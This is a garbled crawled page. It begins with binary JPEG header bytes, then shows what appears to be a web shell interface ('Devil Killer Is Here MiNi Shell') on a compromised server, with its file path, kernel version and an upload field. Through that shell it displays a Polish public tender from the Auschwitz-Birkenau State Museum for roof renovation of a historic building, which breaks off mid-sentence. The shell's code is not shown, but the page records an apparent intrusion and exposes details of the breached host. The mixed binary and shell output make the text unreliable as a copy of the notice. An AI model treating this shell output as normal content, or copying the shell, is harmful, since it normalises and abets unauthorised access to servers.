JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210423/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210423/0003889701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00038897 z dnia 2021-04-23</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont dachu, termomodernizacja stropu poddasza wraz zabudową drzwi na poddasze i do piwnicy wraz z towarzyszącymi pracami konserwatorskimi w zabytkowym budynku o nr inw. A-46 na terenie (...) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000276015</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Więźniów Oświęcimia 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oświęcim</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-603</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 33 844 80 03</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@auschwitz.org</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.auschwitz.org/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont dachu, termomodernizacja stropu poddasza wraz zabudową drzwi na poddasze i do piwnicy wraz z towarzyszącymi pracami konserwatorskimi w zabytkowym budynku o nr inw. A-46 na terenie (...) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4b5cc4a0-a2d0-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00038897</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-04-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00008719/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Remont dachu wraz z pracami konserwatorskimi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/https://bip.malopolska.pl/auschwitz,m,344853,2021.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Złożenie oferty wraz z oświadczeniem i innymi dokumentami wymienionymi w Dziale XI pkt 6 i 7 SWZ oraz jej wycofanie odbywa się przy użyciu miniPortalu zamieszczonego na stronie internetowej https://miniportal.uzp.gov.pl/.System miniPortal zapewnia bezpłatną możliwość szyfrowania ofert.Wymagania techniczne i organizacyjne wysyłania oraz odbierania dokumentów elektronicznych składających się na ofertę wraz z oświadczeniem iinnymi dokumentami wymienionymi w Dziale XI pkt. 6 i 7 SWZ oraz jej wycofanie opisane zostały w Instrukcji korzystania z miniPortaluzamieszczonej na stronie internetowej: https://miniportal.uzp.gov.pl/Instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna RODO znajduje się w Dziale XXI SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna RODO znajduje się w Dziale XXI SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest robota budowlana polegająca na wykonaniu remontu dachu wraz z konserwacją elementów przestrzeni poddasza, kominów i gzymsu, a także termomodernizacja stropu poddasza i zabudowa drzwi na poddasze i do piwnicy w zabytkowym budynku o nr inw. A-46. Budynek, w którym realizowane będzie zamówienie pełni funkcję socjalną, mieszkalną i administracyjną. Budynek o nr inw. A-46 wpisany do rejestru zabytków pod nr rej. A-714/95. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45220000-5 - Roboty inżynieryjne i budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45212314-0 - Roboty budowlane w zakresie pomników historycznych lub miejsc pamięci</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">92522100-7 - Usługi ochrony obiektów historycznych</p> <p class="mb-0">92522200-8 - Usługi ochrony budynków historycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">224 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający, w zależności od potrzeb i środków finansowych, przewiduje udzielenie Wykonawcy, który realizuje zamówienie podstawowe, w okresie do 3 lat od dnia jego udzielenia, zamówienia polegającego na powtórzeniu podobnych robót budowlanych, zgodnie z art. 214 ust. 1 pkt 7 ustawy Pzp, którego przedmiotem będzie wykonanie w budynku o nr inw. A-46 nw. zakresów prac: 1. konserwatorskich dotyczących:- wątku ceglanego;- elementów wykonanych z zapraw mineralnych;- elementów wykonanych z drewna;- elementów wykonanych z metalu;2. robót budowlanych polegających na: - remoncie konstrukcji drewnianej;- wykonaniu i montażu elementów stalowych wzmocnień więźby dachowej;- wykonanie i zawieszenie rynien i rur spustowych;- dostawie i montażu stolarki p. poż.;- naprawie i wzmocnieniu kominów.Wynagrodzenie wykonawcy za realizację zamówienia podobnego zostanie ustalone w nw. sposób:a) dla robót budowlanych:- ceny jednostkowe robót zostaną przyjęte z kosztorysu robót budowlanych, zgodne z wartościami zamieszczonymi w ofercie Wykonawcy, opracowanego metodą kalkulacji szczegółowej i zawierającego koszty wykonania wszystkich zakresów przedmiotu umowy; - ceny czynników produkcji zostaną przyjęte z zeszytów SEKOCENBUD (jako średnie) za okres ich wbudowania. Podstawą do określenia nakładów rzeczowych będą KNR-y. W przypadku braku odpowiednich pozycji + KNNR-y, a następnie wycena indywidualna Wykonawcy zatwierdzona przez Zamawiającego;b) dla prac konserwatorskich- ceny zostaną przyjęte na podstawie kosztorysu przygotowanego przez Wykonawcę, w oparciu o rynkowe ceny materiałów, robocizny oraz sprzętu, a zatwierdzonych przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie osób skierowanych do realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Dział V pkt 3 SWZO udzielenie zamówienia mogą się ubiegać wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej:3.1.	w zakresie doświadczenia wykonawców - wykażą, że w okresie ostatnich siedmiu (7) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie należycie wykonali, co najmniej:3.1.1.	jedną robotę budowlaną o charakterze ogólnobudowlanym o wartości min. 500 000 zł brutto, w budynku wpisanym do rejestru zabytków lub innego właściwego rejestru* lub inwentarza muzeum będącego instytucją kultury; 3.1.2.	jedną robotę budowlaną o wartości min. 150 000 zł brutto polegającą na remoncie zabytkowej więźby lub innej zabytkowej konstrukcji drewnianej w budynku wpisanym do rejestru zabytków lub innego właściwego rejestru* lub inwentarza muzeum będącego instytucją kultury; 3.1.3.	jedną robotę budowlaną, polegającą na wzmocnieniu konstrukcją stalową/elementami stalowymi obiektu budowlanego wpisanego do rejestru zabytków lub innego właściwego rejestru* lub inwentarza muzeum będącego instytucją kultury;3.1.4.	jedną usługę polegająca na wykonaniu prac konserwatorskich o wartości min. 250 000 zł brutto w budynku wpisanym do rejestru zabytków lub innego właściwego rejestru* lub inwentarza muzeum będącego instytucją kultury;3.1.5.	jedną usługę polegającą na wykonaniu prac konserwatorskich wątku ceglanego na powierzchni min. 100 m2 w obiekcie budowlanym wpisanym do rejestru zabytków lub innego właściwego rejestru* lub inwentarza muzeum będącego instytucją kultury;3.1.6.	jedną usługę polegającą na wykonaniu prac konserwatorskich w zakresie nawarstwień malarskich na podłożu drewnianym lub mineralnym na łącznej powierzchni min. 20 m2 w budynku wpisanym do rejestru zabytków lub innego właściwego rejestru* lub inwentarza muzeum będącego instytucją kultury.Przez „robotę budowlaną o charakterze ogólnobudowlanym” Zamawiający uzna robotę budowlaną, w której roboty instalacyjne stanowiły nie więcej niż 50% całkowitej wartości roboty budowlanej.Przez „zabytkową więźbę lub inną zabytkową konstrukcję drewnianą” Zamawiający uzna:- więźbę pierwotną (tj. więźbę, która w przeszłości nie podlegała wymianie) lub pierwotną konstrukcję drewnianą dla danego budynku wpisanego do rejestru zabytków lub innego właściwego rejestru* lub inwentarza muzeum będącego instytucją kulturylub więźbę lub konstrukcję drewnianą nie pierwotną, lecz starszą niż 70 lat.Zamawiający uzna warunek udziału w postępowaniu w zakresie doświadczenia Wykonawców (pkt 3.1.) za spełniony:a)	jeżeli Wykonawca wykaże się należytą realizacją:- co najmniej dwóch umów/zamówień łącznie obejmujących swoim zakresem wymagania określone w od pkt 3.1.1. do pkt 3.1.3.oraz- co najmniej dwóch umów/zamówień łącznie obejmujących swoim zakresem wymagania określone w od pkt 3.1.4. do pkt 3.1.6.;b)	w przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), jeżeli co najmniej jeden z uczestników konsorcjum, zgodnie z art. 117 ust. 1 ustawy Pzp, wykaże się na zasadach określonych w art. 118 ustawy Pzp należytą realizacją:- co najmniej dwóch umów/zamówień łącznie obejmujących swoim zakresem wymagania określone w od pkt 3.1.1. do pkt 3.1.3. lub- co najmniej dwóch umów/zamówień łącznie obejmujących swoim zakresem wymagania określone w od pkt 3.1.4. do pkt 3.1.6.;c) w sytuacji, gdy Wykonawca, który nie posiada wymaganego doświadczenia i polega w celu wykazania spełniania warunku udziału w postępowaniu w zakresie doświadczenia na zdolnościach podmiotu udostępniającego zasoby, na zasadach określonych w art. 118 ustawy Pzp, jeżeli co najmniej jeden taki podmiot wykaże się należytą realizacją:- co najmniej dwóch umów/zamówień łącznie obejmujących swoim zakresem wymagania określone w od pkt 3.1.1. do pkt 3.1.3. lub- co najmniej dwóch umów/zamówień łącznie obejmujących swoim zakresem wymagania określone w od pkt 3.1.4. do pkt 3.1.6.3.2.	w zakresie osób skierowanych przez wykonawców do realizacji zamówienia – wykażą dysponowanie osobami spełniającymi niżej określone wymagania: 3.2.1.	Kierownikiem budowy (jedna osoba), posiadającym uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej oraz posiadającym doświadczenie polegające na:a)	co najmniej 18-miesięcznym udziale w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru zabytków lub innego właściwego rejestru* lub inwentarza muzeum będącego instytucją kultury, zgodnie z art. 37c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opieki nad zabytkami; b)	co najmniej 3-letnim (licząc jako suma przepracowanych miesięcy od momentu uzyskania uprawnień do kierowania robotami przy zabytkach nieruchomych) w przeciągu ostatnich 10 lat przed upływem terminu składania ofert - kierowaniu robotami budowlanymi przy zabytkach nieruchomych wpisanych do rejestru zabytków lub innego właściwego rejestru* lub inwentarza muzeum będącego instytucją kultury, zgodnie z art. 37c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami;3.2.2.	Kierownikiem robót (jedna osoba), posiadającym uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;UWAGA: Osoby, o których mowa powyżej w pkt 3.2.1. i pkt 3.2.2. muszą być wpisane na listę właściwego samorządu zawodowego.3.2.3.	trzema (3) osobami, każda z nich posiadająca min. 24-miesięczne doświadczenie w realizacji robót budowlanych w co najmniej 2 obiektach budowlanych wpisanych do rejestru zabytków, z których to osób co najmniej dwie (2) osoby powinny posiadać min. 12-miesięczne doświadczenie ciesielskie w realizacji robót budowlanych polegających na remoncie zabytkowej więźby dachowej lub konstrukcji drewnianej w budynkach wpisanych do rejestru zabytków lub innego właściwego rejestru* lub inwentarza muzeum będącego instytucją kultury; 3.2.4.	jedną osobą wykonującą zabieg dezynsekcji metodą mikrofalową, posiadającą min. 6-miesięczne doświadczenie w wykonywaniu usług dezynsekcji metodą mikrofalową drewnianych elementów konstrukcyjnych budynków wpisanych do rejestru zabytków lub innego właściwego rejestru* lub inwentarza muzeum będącego instytucją kultury;3.2.5.	Kierownikiem prac konserwatorskich - dyplomowany konserwator (jedna osoba), posiadającym: a) tytuł zawodowy magistra uzyskany po ukończeniu studiów drugiego stopnia lub jednolitych studiów magisterskich w zakresie konserwacji i restauracji dzieł sztuki lub konserwacji zabytków w zakresie specjalności dotyczącej konserwacji i restauracji malarstwa lub konserwacji i restauracji elementów i detali architektonicznych lub konserwacji rzeźby, posiadającym doświadczenie opisane w art. 37a ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami; b) min. 5-letnie doświadczenie (nabyte po uzyskaniu tytułu zawodowego magistra) w kierowaniu pracami konserwatorskimi prowadzonymi przy zabytkach wpisanych do rejestru zabytków lub innego właściwego rejestru* lub inwentarza muzeum będącego instytucją kultury lub zaliczanych do jednej z kategorii, o których mowa w art. 64 ust. 1 ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami;3.2.6.	Zespołem realizującym prace konserwatorskie składającym się co najmniej z dwóch (2) konserwatorów dyplomowanych, posiadających tytuły zawodowe magistra uzyskane po ukończeniu studiów drugiego stopnia lub jednolitych studiów magisterskich w zakresie konserwacji i restauracji dzieł sztuki lub konserwacji zabytków, obaj posiadający nabyte po ukończeniu studiów min. 2-letnie doświadczenie w realizacji prac konserwatorskich, prowadzonych przy zabytkach wpisanych do rejestru zabytków lub innego właściwego rejestru* lub inwentarza muzeum będącego instytucją kultury lub zaliczanych do jednej z kategorii, o których mowa w art. 64 ust. 1 ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami, z których:a) jedna osoba przewidziana do pełnienia funkcji konserwatora w specjalności dotyczącej konserwacji i restauracji elementów i detali architektonicznych lub konserwacji rzeźby - posiada min. 12-miesięczne doświadczenie w realizacji prac konserwatorskich wątku ceglanego w obiektach budowlanych wpisanych do rejestru zabytków lub innego właściwego rejestru* lub inwentarza muzeum będącego instytucją kultury; b) jedna osoba przewidziana do pełnienia funkcji konserwatora w specjalności dotyczącej konserwacji i restauracji malarstwa – posiada min. 12-miesięczne doświadczenie w realizacji prac konserwatorskich nawarstwień malarskich na podłożu mineralnym oraz min. 6-miesięczne doświadczenie w realizacji prac konserwatorskich na podłożu drewnianym w obiektach wpisanych do rejestru zabytków lub innego właściwego rejestru* lub inwentarza muzeum będącego instytucją kultury;3.2.7.	Zespołem pracowników technicznych wykonujących prace konserwatorskie składającym się co najmniej z dwóch (2) pracowników, z których każdy posiada min. 18-miesięczne doświadczenie w realizacji prac konserwatorskich w obiektach budowlanych wpisanych do rejestru zabytków, lub innego właściwego rejestru* lub inwentarza muzeum będącego instytucją kultury;3.2.8.	jedną osobą wykonującą dokumentację fotograficzną - posiadającą doświadczenie w wykonywaniu fotografii na potrzeby dokumentacji powykonawczej lub dokumentacji stanu zachowania w minimum 3 obiektach wpisanych do rejestru zabytków lub innego właściwego rejestru* lub inwentarza muzeum będącego instytucją kultury.Wskazane przez Wykonawcę okresy doświadczenia osób, które zostaną skierowane do realizacji zamówienia nie podlegają sumowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wymaga złożenia nw. podmiotowych środków dowodowych (aktualnych na dzień ich złożenia) w celu wykazania spełniania warunków udziału w postępowaniu, dotyczących zdolności technicznej i zawodowej, określonych w Dziale V pkt 3.1 i 3.2 SWZ: 1.	w związku z bezpośrednim związkiem sposobu oceny spełniania przez Wykonawcę warunku udziału w postępowaniu w zakresie wykazania dysponowania osobami, które zostaną skierowane do realizacji zamówienia (Dział V pkt 3.2. SWZ) z oceną ofert określoną w Kryterium nr 2: „Doświadczenie osób wyznaczonych do realizacji zamówienia”, Zamawiający wymaga złożenia wraz z ofertą Wykazu osób (Załącznik nr 5 do SWZ) skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór Wykazu osób stanowi Załącznik nr 5 do SWZ;2.	w celu wykazania spełniania warunku udziału w postępowaniu w zakresie doświadczenia (Dział V pkt 3.1. SWZ) Zamawiający wymaga od Wykonawcy złożenia w odpowiedzi na wezwanie Wykazu robót (Załącznik nr 4 do SWZ) wykonanych nie wcześniej niż w okresie 7 lat od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których roboty zostały wykonane oraz załączeniem dowodów określających, czy te roboty zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wzór Wykazu robót stanowi Załącznik nr 4 do SWZ;UWAGA: Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót wykonywanych wspólnie z innymi wykonawcami, Wykaz robót (Załącznik nr 4 do SWZ) dotyczy robót, w których wykonaniu Wykonawca ten bezpośrednio 